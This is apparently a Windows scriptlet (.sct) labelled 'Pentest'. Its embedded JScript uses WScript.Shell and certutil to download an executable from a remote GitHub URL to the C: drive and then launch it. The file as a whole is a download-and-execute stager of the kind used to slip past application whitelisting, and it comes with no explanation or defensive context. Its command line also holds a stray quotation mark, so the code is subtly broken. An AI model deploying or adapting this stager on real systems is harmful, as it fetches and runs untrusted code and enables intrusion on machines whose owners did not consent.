<?XML version="1.0"?>
<scriptlet>
<registration         
progid="Pentest"       
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
 
<![CDATA[   
var r = new ActiveXObject("WScript.Shell").Run("cmd /c certutil.exe -urlcache -split -f https://github.com/void010/dummy/blob/main/cpp_poc.exe c:\cpp_poc.exe & start c:\cpp_poc.exe""); 
]]>
 
</script>
</registration>
</scriptlet>
